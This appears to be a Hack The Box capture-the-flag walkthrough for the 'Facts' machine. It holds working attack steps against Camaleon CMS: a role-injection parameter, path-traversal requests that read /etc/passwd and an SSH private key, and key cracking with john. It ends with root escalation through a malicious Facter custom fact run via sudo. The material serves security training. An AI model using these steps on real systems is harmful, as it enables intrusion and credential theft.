📄Fact

https://app.hackthebox.com/machines/Facts

Facts Walkthrough

1. Initial Reconnaissance

Service Enumeration

sudo nmap -sCV <target>

Result - SSH exposed - HTTP exposed - Web service redirected to CMS virtual host

2. Web Enumeration

Directory Enumeration

ffuf -u http://<host>/FUZZ      -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt      -mc 200,301,302

Discovered paths - /admin

3. CMS Identification

Checked page source of /admin and identified:

Camaleon CMS version 2.9.0

4. Privilege Escalation to Admin

CVE-2025-2304 --- Role Injection

Register a low-privileged user
Intercept password change request
Modify POST body:

password[role]=admin

Forward the request (do not replay)
User role escalated to admin

5. Authenticated Arbitrary File Read

CVE-2024-46987

Vulnerable Endpoint

GET /admin/media/download_private_file?file=../../../../../../../../<path>

Example: Reading `/etc/passwd`

GET /admin/media/download_private_file?file=../../../../../../../../etc/passwd

6. Sensitive File Discovery

Read User Home Directories

GET /admin/media/download_private_file?file=../../../../../../../../home/william/user.txt

Extract SSH Private Key

GET /admin/media/download_private_file?file=../../../../../../../../home/trivia/.ssh/id_ed25519

Saved response locally as:

nano id_ed25519

7. Cracking SSH Private Key

Convert Key for John

ssh2john id_ed25519 > id_ed25519.john

Crack with Wordlist

john --wordlist=/usr/share/wordlists/rockyou.txt id_ed25519.john

Show Result

john --show id_ed25519.john

8. SSH Access

Fix Permissions (WSL/Linux)

mkdir -p ~/.ssh
cp id_ed25519 ~/.ssh/id_ed25519
chmod 600 ~/.ssh/id_ed25519

ssh -i ~/.ssh/id_ed25519 trivia@<host>

Enter key passphrase when prompted.

9. Sudo Enumeration

sudo -l

Result

(ALL) NOPASSWD: /usr/bin/facter

10. Privilege Escalation to Root

Abusing Facter Custom Facts

Create Malicious Fact

mkdir /tmp/facts
nano /tmp/facts/exploit.rb

Facter.add(:pwned) do
  setcode do
    system("/bin/bash")
  end
end

Execute as Root

sudo /usr/bin/facter --custom-dir /tmp/facts

Verify

id

Expected:

uid=0(root) gid=0(root)

11. Impact

Admin takeover via parameter injection
Arbitrary file read on server
SSH access via cracked private key
Root privilege escalation via misconfigured sudo

Vulnerabilities Summary

Step Issue

CMS Admin Escalation CVE-2025-2304 Arbitrary File Read CVE-2024-46987 Root Escalation Sudo misconfiguration (facter)

End of report

Last updated 10 days ago

hashtagFacts Walkthrough

hashtag1. Initial Reconnaissance

hashtagService Enumeration

hashtag2. Web Enumeration

hashtagDirectory Enumeration

hashtag3. CMS Identification

hashtag4. Privilege Escalation to Admin

hashtagCVE-2025-2304 --- Role Injection

hashtag5. Authenticated Arbitrary File Read

hashtagCVE-2024-46987

hashtagVulnerable Endpoint

hashtagExample: Reading /etc/passwd

hashtag6. Sensitive File Discovery

hashtagRead User Home Directories

hashtagExtract SSH Private Key

hashtag7. Cracking SSH Private Key

hashtagConvert Key for John

hashtagCrack with Wordlist

hashtagShow Result

hashtag8. SSH Access

hashtagFix Permissions (WSL/Linux)

hashtagLogin Using Key

hashtag9. Sudo Enumeration

hashtag10. Privilege Escalation to Root

hashtagAbusing Facter Custom Facts

hashtagCreate Malicious Fact

hashtagExecute as Root

hashtagVerify

hashtag11. Impact

hashtagVulnerabilities Summary